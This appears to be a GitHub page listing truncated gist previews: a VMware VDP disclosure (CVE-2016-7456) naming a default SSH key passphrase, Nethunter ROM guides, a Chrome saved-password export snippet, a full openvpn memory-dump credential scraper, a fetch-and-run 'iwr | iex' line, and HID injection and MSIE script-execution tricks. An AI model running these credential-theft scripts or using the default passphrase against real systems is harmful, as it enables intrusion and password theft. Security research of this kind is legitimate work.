Skip to content

Instantly share code, notes, and snippets.

View jmingov's full-sized avatar

3boll jmingov

117 followers · 61 following
View GitHub Profile
@phroxvs
phroxvs / CVE-2016-7456.rst
Last active February 12, 2017 21:23
CVE-2016-7456

# Background and description

The VMware vSphere Data Protection (VDP) appliance is based on the EMC Avamar solution. To perform an in-depth analysis of VDP, a virtual test appliance of EMC Avamar was downloaded. Known Avamar default credentials did work fine on the Avamar appliance, but were not valid to log into the vSphere Data Protection. Further file system objects in the EMC Avamar appliance were analyzed, leading to the interesting detection of a private SSH key belonging to the admin user.

A web search did reveal that the corresponding password for the SSH key file is ‘P3t3rPan’ (see http://judsonian.com/content/licensing-an-avamar-system/). Using the SSH key file a login as admin to the VMware Data Protection was successful and did grant root permissions on the appliance.

# Disclosure timeline

11.08.2016 report of vulnerability to VMware Security Response team

@nethunteros
nethunteros / makingbacon.MD
Last active September 5, 2019 11:11
NethunterOS and multirom for OnePlus1

Guide for Installing Multirom with Nethunter on a OnePlus 1

You may want to be able to pick between a NethunterOS (based on LineageOS) and a different ROM to seperate work from please.

Multirom allows you to pick which OS (or ROM) to load on boot (think of GRUB).

Prerequisites

  • Fastboot installed on computer (versions available for OSX/Windows/Linux)
  • OnePlus 1 (unlocked)
@nethunteros
nethunteros / setupenv
Created January 1, 2017 15:17
Easily select toolchain between 64bit and 32 bit kernel builds for Android
#/bin/bash
#
# Download toolschains:
# git clone https://android.googlesource.com/platform/prebuilts/gcc/linux-x86/arm/arm-eabi-4.7 toolchain
# git clone https://android.googlesource.com/platform/prebuilts/gcc/linux-x86/aarch64/aarch64-linux-android-4.9 -b marshmallow-release toolchain64
#
# Instructions to set toolchain for build:
# source setupenv 64
case "$1" in
@binkybear
binkybear / NETHUNTEROS.MD
Last active December 4, 2024 14:01
Nethunter ROM on Nexus 5 & 6P with Nexmon (testing only)

Nethunter OS on Nexus 5/Nexus 6P

Here are instructions to install Nethunter (as a ROM) with working native monitor mode in the chroot using Nexmon. The ROM is a modified CM 14.1 (nougat) base with custom kernel which supports: HID, Drivedroid, Kexec, and external wireless.

What you need

You will need the following 3 items (maybe 4):

Nexus 5 Devices:

@cure53
cure53 / scriptlet.md
Last active February 1, 2024 19:33
The Scriptless Scriptlet - Or how to execute JavaScript from CSS in MSIE11 without using Scripts

The Scriptless Scriptlet

Or how to execute JavaScript from CSS in MSIE11 without using Scripts

Stop! This text is only interesting for you if you...

  • Like popping alerts in weird situations
  • Miss CSS expressions as much as we do
  • Have an unhealthy obsession for markup porn

Introduction

@walalm
walalm / GoogleChromePasswordExport.js
Last active April 22, 2021 11:00
var decryptedRow="";
var pm = PasswordManager.getInstance();
var model = pm.savedPasswordsList_.dataModel;
var pl = pm.savedPasswordsList_;
for(i=0;i<model.length;i++){
PasswordManager.requestShowPassword(i);
};
setTimeout(function(){
decryptedRow += '"Name","URL","Username","Password"';
for(i=0; i<model.length; i++){
@alirobe
alirobe / reclaimWindows10.ps1
Last active April 20, 2025 23:02
This Windows 10 Setup Script turns off a bunch of unnecessary Windows 10 telemetery, bloatware, & privacy things. Not guaranteed to catch everything. Review and tweak before running. Reboot after running. Scripts for reversing are included and commented. Fork of https://github.com/Disassembler0/Win10-Initial-Setup-Script (different defaults). N.…
###
###
### UPDATE: For Win 11, I recommend using this tool in place of this script:
### https://christitus.com/windows-tool/
### https://github.com/ChrisTitusTech/winutil
### https://www.youtube.com/watch?v=6UQZ5oQg8XA
### iwr -useb https://christitus.com/win | iex
###
### OR take a look at
### https://github.com/HotCakeX/Harden-Windows-Security
@binkybear
binkybear / filetohid.py
Last active January 6, 2016 02:52
filetohid.py
import argparse # Handle arguments
import os # To write hid comands to system
from keyseed import * # The bytes to translate to keyboard codes
'''
Arguments for filetohid.py
python filetohid.py -f [inputfile] -l us
python filetohid.py -s "this is a string" -l us
@rvrsh3ll
rvrsh3ll / openvpnScraper.sh
Last active January 24, 2022 14:35
#!/bin/bash
# This little hack-job will grab credentials from a running openvpn process in Linux
# Keep in mind this won't work if the user used the --auth-nocache flag
pid=$(ps -efww | grep -v grep | grep openvpn | awk '{print $2}')
echo $pid | grep rw-p /proc/$pid/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $pid -ex "dump memory $pid-$start-$stop.dump 0x$start 0x$stop"; done
echo "Your credentials should be listed below as username/password"
strings *.dump | awk 'NR>=3 && NR<=4 { print }'
rm *.dump --force
@dfletcher
dfletcher / tsws
Last active July 21, 2018 12:47
Totally simple web server using Bash and netcat (nc)
Moved to a proprer repositoy, TSWS is a real boy now!
https://github.com/dfletcher/tsws
PRs welcomed.